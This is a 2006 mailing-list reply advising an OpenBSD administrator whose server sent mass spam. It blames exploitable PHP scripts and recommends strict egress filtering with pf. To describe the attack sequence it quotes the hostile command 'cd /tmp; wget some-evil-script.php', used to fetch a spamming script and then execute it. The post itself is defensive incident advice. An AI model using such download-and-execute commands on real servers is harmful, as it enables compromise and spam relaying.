On Wednesday 25 January 2006 12:09, you wrote: > ... I've noticed that the > "mailstats" command reports 130000 (!!!) messages sent (!) outside. My > computer is a small server running OpenBSD 3.8, MySQL+PHP+Apache for the > website;
There's one potential smoking gun right there. PHP. You know PGP stands for 'Pretty Good Privacy'? Well, I think PHP stands for 'Pretty Hopeless Privacy'. What PHP scripts are you or your users running? Any phpbb installations? *nukes? What other PHP scripts are installed? phpbb and the various nukes are notorious for exploits. It is quite often the case that well known PHP scripts are getting exploited - I've seen it twice in the field where a PHP script was exploited by phishers/spammers. The general sequence of events is: 1. User installs exploitable PHP script 2. Phisherman finds it. 3. Phisherman exploits it, and using the shell execution exploit, executes 'cd /tmp; wget some-evil-script.php' and then exploits it again to run /tmp/some-evil-script.php (in PHP command line mode). Some-evil-script.php turns out to be a spamming script. They don't need to root your server, they just need to be able to write somewhere. Have a poke around where Apache has write access, I bet you find some dodgy PHP scripts. Look through the logs for attempted exploits on PHP scripts (you can usually find %-encoded versions of commands in the arguments to the PHP script). The other possibility is one of your users has a virus/trojan/worm that uses their Outlook settings to relay mail through your mail server. Tell your users to relay through their ISP only, you just don't want to get involved with being the mail relay for your users if you can help it. However, I suspect you've been exploited via a buggy insecure PHP script. To stop this happening again: Apply strict egress filtering. Allow *no traffic out at all*. There is probably no reason your server should be making any outbound connections except via a few daemons (DNS and outbound SMTP spring to mind - for those use 'pf' rules that only allow BIND and sendmail to send data out on those ports). Strict egress filtering will prevent phishers/spammers from managing to do the 'wget some-evil-script.php' to get the spamming script onto your server. No, 'chmod 700 wget' is no substitute - it's trivial to write a Perl script that can be injected via your vulnerable PHP script to do open a socket to a remote server and download a file. Block ALL OUTBOUND ACCESS to anything except for what explicitly should happen: DNS lookups to the two or three DNS servers listed in resolv.conf, and SMTP access (if you absolutely cannot avoid allowing outbound SMTP) to the sendmail process only (user _sendmail). Egress filtering is often forgotten, missed or not considered - but it is every bit as important as filtering inbound traffic (possibly more so, as y ou have discovered). Never forget egress filtering. And keep an eye on your users - particularly what PHP scripts they have installed. Apply a LART if they don't keep up to date with security patches. Have a policy of banning scripts known to have a bad security track record.
